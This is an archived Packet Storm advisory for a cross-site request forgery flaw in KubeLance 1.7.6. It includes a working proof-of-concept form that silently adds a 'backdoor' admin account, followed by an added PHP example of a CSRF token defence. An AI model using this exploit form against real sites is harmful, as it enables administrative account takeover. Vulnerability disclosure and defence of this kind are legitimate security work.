KubeLance 1.7.6 Cross Site Request Forgery

2010-02-03T00:00:00
ID PACKETSTORM:85881
Type packetstorm
Reporter Milos Zivanovic
Modified 2010-02-03T00:00:00

Description

[#-----------------------------------------------------------------------------------------------#]  
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability  
[#] Author: Milos Zivanovic  
[#] Email: milosz.security[at]gmail[dot]com  
[#] Date: 02. February 2010.  
[#-----------------------------------------------------------------------------------------------#]  
[#] Application: KubeLance  
[#] Version: 1.7.6  
[#] Platform: PHP  
[#] Link: http://www.kubelabs.com/kubelance/  
[#] Price: 90 $  
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)  
[#-----------------------------------------------------------------------------------------------#]  
  
The KubeLance script lacks cross site request forgery protection, which allows an attacker to build an exploit  
page that adds a new admin user when an authenticated administrator visits it.  
  
[EXPLOIT------------------------------------------------------------------------------------------]  
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">  
<input type="hidden" name="username" value="backdoor">  
<input type="hidden" name="password" value="another-admin-added">  
<input type="submit" name="submit">  
</form>  
[EXPLOIT------------------------------------------------------------------------------------------]  
  
[#]EOF  
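As an added example that is not part of the advisory or of KubeLance's own code, the following PHP shows the kind of per-session synchronizer token an admin-creation handler like admin_add.php could require so that a forged cross-site form such as the one above is rejected. The handler layout, the csrf_* function names and the add_admin() helper are assumptions; only the field names username and password come from the advisory.

```php
<?php
// Added example (not KubeLance code): synchronizer-token CSRF defence for an
// admin-creation form. The form field names mirror the advisory; the handler
// structure and the add_admin() helper are assumed.
declare(strict_types=1);

session_start();

// Issue one random token per session and reuse it for every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject missing, non-string or mismatched tokens; compare in constant time.
// No type hint on $submitted: a client may send an array, which must simply fail.
function csrf_token_is_valid($submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Hidden field that makes the browser echo the session's token back with the POST.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A page on another origin cannot read this session's token, so a forged
    // form arrives without it (or with a guess) and is refused here.
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // Assumed helper: verify the current user is an authenticated admin and
    // create the account only then.
    // add_admin($_POST['username'] ?? '', $_POST['password'] ?? '');
    exit('Admin created.');
}
?>
<form action="admin_add.php" method="post">
  <?= csrf_field() ?>
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" name="submit" value="Add admin">
</form>
```

The token only blocks requests a foreign page submits on the admin's behalf; the handler must still confirm that the session belongs to an authenticated administrator before creating the account. Setting the session cookie with SameSite=Lax (via session_set_cookie_params on PHP 7.3 and later) adds a second, browser-enforced layer against the same cross-site POST.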